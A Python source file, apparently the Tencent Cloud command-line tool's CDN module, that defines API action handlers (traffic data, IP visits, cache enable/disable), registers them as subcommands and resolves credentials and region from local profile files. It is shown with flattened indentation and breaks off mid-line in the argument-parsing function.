import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli.nice_command import NiceCommand
import tccli.error_msg as ErrorMsg
import tccli.help_template as HelpTemplate
from tccli import __version__
from tccli.utils import Utils
from tccli.configure import Configure
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cdn.v20180606 import cdn_client as cdn_client_v20180606
from tencentcloud.cdn.v20180606 import models as models_v20180606
from tccli.services.cdn import v20180606
from tccli.services.cdn.v20180606 import help as v20180606_help
def doListTopData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("ListTopData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Filter": Utils.try_to_json(argv, "--Filter"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Detail": Utils.try_to_json(argv, "--Detail"),
"Code": Utils.try_to_json(argv, "--Code"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ListTopDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.ListTopData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeOriginData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeOriginData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
"Detail": Utils.try_to_json(argv, "--Detail"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeOriginDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeOriginData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMapInfo(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeMapInfo", g_param[OptionsDefine.Version])
return
param = {
"Name": Utils.try_to_json(argv, "--Name"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMapInfoRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeMapInfo(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doGetDisableRecords(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("GetDisableRecords", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Url": Utils.try_to_json(argv, "--Url"),
"Status": Utils.try_to_json(argv, "--Status"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.GetDisableRecordsRequest()
model.from_json_string(json.dumps(param))
rsp = client.GetDisableRecords(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribePayType(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribePayType", g_param[OptionsDefine.Version])
return
param = {
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribePayTypeRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribePayType(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeIpVisit(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeIpVisit", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeIpVisitRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeIpVisit(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCdnData(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DescribeCdnData", g_param[OptionsDefine.Version])
return
param = {
"StartTime": Utils.try_to_json(argv, "--StartTime"),
"EndTime": Utils.try_to_json(argv, "--EndTime"),
"Metric": Utils.try_to_json(argv, "--Metric"),
"Domains": Utils.try_to_json(argv, "--Domains"),
"Project": Utils.try_to_json(argv, "--Project"),
"Interval": Utils.try_to_json(argv, "--Interval"),
"Detail": Utils.try_to_json(argv, "--Detail"),
"Isp": Utils.try_to_json(argv, "--Isp"),
"District": Utils.try_to_json(argv, "--District"),
"Protocol": Utils.try_to_json(argv, "--Protocol"),
"DataSource": Utils.try_to_json(argv, "--DataSource"),
"IpProtocol": Utils.try_to_json(argv, "--IpProtocol"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCdnDataRequest()
model.from_json_string(json.dumps(param))
rsp = client.DescribeCdnData(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDisableCaches(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("DisableCaches", g_param[OptionsDefine.Version])
return
param = {
"Urls": Utils.try_to_json(argv, "--Urls"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DisableCachesRequest()
model.from_json_string(json.dumps(param))
rsp = client.DisableCaches(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableCaches(argv, arglist):
g_param = parse_global_arg(argv)
if "help" in argv:
show_help("EnableCaches", g_param[OptionsDefine.Version])
return
param = {
"Urls": Utils.try_to_json(argv, "--Urls"),
}
cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CdnClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.EnableCachesRequest()
model.from_json_string(json.dumps(param))
rsp = client.EnableCaches(model)
result = rsp.to_json_string()
jsonobj = None
try:
jsonobj = json.loads(result)
except TypeError as e:
jsonobj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", jsonobj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
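# Each do* handler above rebuilds the same credential/profile/client
# boilerplate. A hypothetical helper (not part of the generated CLI) that
# captures the shared pattern:
def _build_cdn_client(g_param):
    cred = credential.Credential(g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey])
    http_profile = HttpProfile(
        reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    # CLIENT_MAP is defined just below; it is resolved at call time.
    client = CLIENT_MAP[g_param[OptionsDefine.Version]].CdnClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    return client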
CLIENT_MAP = {
"v20180606": cdn_client_v20180606,
}
MODELS_MAP = {
"v20180606": models_v20180606,
}
ACTION_MAP = {
"ListTopData": doListTopData,
"DescribeOriginData": doDescribeOriginData,
"DescribeMapInfo": doDescribeMapInfo,
"GetDisableRecords": doGetDisableRecords,
"DescribePayType": doDescribePayType,
"DescribeIpVisit": doDescribeIpVisit,
"DescribeCdnData": doDescribeCdnData,
"DisableCaches": doDisableCaches,
"EnableCaches": doEnableCaches,
}
AVAILABLE_VERSION_LIST = [
v20180606.version,
]
AVAILABLE_VERSIONS = {
'v' + v20180606.version.replace('-', ''): {"help": v20180606_help.INFO,"desc": v20180606_help.DESC},
}
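# Illustrative invocation (the exact entry-point name is an assumption):
# actions registered below are exposed as subcommands, e.g.
#   tccli cdn DescribeCdnData --StartTime "2019-09-01 00:00:00" --EndTime "2019-09-01 23:59:59" --Metric flux
# with option names taken from the param dicts in the handlers above.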
def cdn_action(argv, arglist):
if "help" in argv:
versions = sorted(AVAILABLE_VERSIONS.keys())
opt_v = "--" + OptionsDefine.Version
version = versions[-1]
if opt_v in argv:
version = 'v' + argv[opt_v].replace('-', '')
if version not in versions:
print("available versions: %s" % " ".join(AVAILABLE_VERSION_LIST))
return
action_str = ""
docs = AVAILABLE_VERSIONS[version]["help"]
desc = AVAILABLE_VERSIONS[version]["desc"]
for action, info in docs.items():
action_str += " %s\n" % action
action_str += Utils.split_str(" ", info["desc"], 120)
helpstr = HelpTemplate.SERVICE % {"name": "cdn", "desc": desc, "actions": action_str}
print(helpstr)
else:
print(ErrorMsg.FEW_ARG)
def version_merge():
help_merge = {}
for v in AVAILABLE_VERSIONS:
for action in AVAILABLE_VERSIONS[v]["help"]:
if action not in help_merge:
help_merge[action] = {}
help_merge[action]["cb"] = ACTION_MAP[action]
help_merge[action]["params"] = []
for param in AVAILABLE_VERSIONS[v]["help"][action]["params"]:
if param["name"] not in help_merge[action]["params"]:
help_merge[action]["params"].append(param["name"])
return help_merge
def register_arg(command):
cmd = NiceCommand("cdn", cdn_action)
command.reg_cmd(cmd)
cmd.reg_opt("help", "bool")
cmd.reg_opt(OptionsDefine.Version, "string")
help_merge = version_merge()
for actionName, action in help_merge.items():
c = NiceCommand(actionName, action["cb"])
cmd.reg_cmd(c)
c.reg_opt("help", "bool")
for param in action["params"]:
c.reg_opt("--" + param, "string")
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
c.reg_opt(stropt, "string")
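# parse_global_arg (below) resolves each global option with command-line
# values taking priority; missing SecretId/SecretKey fall back to the
# selected profile's credential file, and other options (e.g. Region) fall
# back to its configure file.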
def parse_global_arg(argv):
params = {}
for opt in OptionsDefine.ACTION_GLOBAL_OPT:
stropt = "--" + opt
if stropt in argv:
params[opt] = argv[stropt]
else:
params[opt] = None
if params[OptionsDefine.Version]:
params[OptionsDefine.Version] = "v" + params[OptionsDefine.Version].replace('-', '')
config_handle = Configure()
profile = config_handle.profile
if ("--" + OptionsDefine.Profile) in argv:
profile = argv[("--" + OptionsDefine.Profile)]
is_conexist, conf_path = config_handle._profile_existed(profile + "." + config_handle.configure)
is_creexist, cred_path = config_handle._profile_existed(profile + "." + config_handle.credential)
config = {}
cred = {}
if is_conexist:
config = config_handle._load_json_msg(conf_path)
if is_creexist:
cred = config_handle._load_json_msg(cred_path)
for param in params.keys():
if param == OptionsDefine.Version:
continue
if params[param] is None:
if param in [OptionsDefine.SecretKey, OptionsDefine.SecretId]:
if param in cred:
params[param] = cred[param]
else:
raise Exception("%s is invalid" % param)
else:
if param in config:
params[param] = config[param]
elif param == OptionsDefine.Region:
raise Exception("%s is invalid" % OptionsDefine.Region)
try:
if params[OptionsDefine.Version] is None:
version = config["cdn"][OptionsDefine.Version]
params[OptionsDefine.Version] = "v" + version.replace('-', '')
if params[OptionsDefine.Endpoint] is None:
params[OptionsDefine.Endpoint] = config["cdn"][OptionsDefine.Endpoint]
except Exception as err:
raise Exception("config |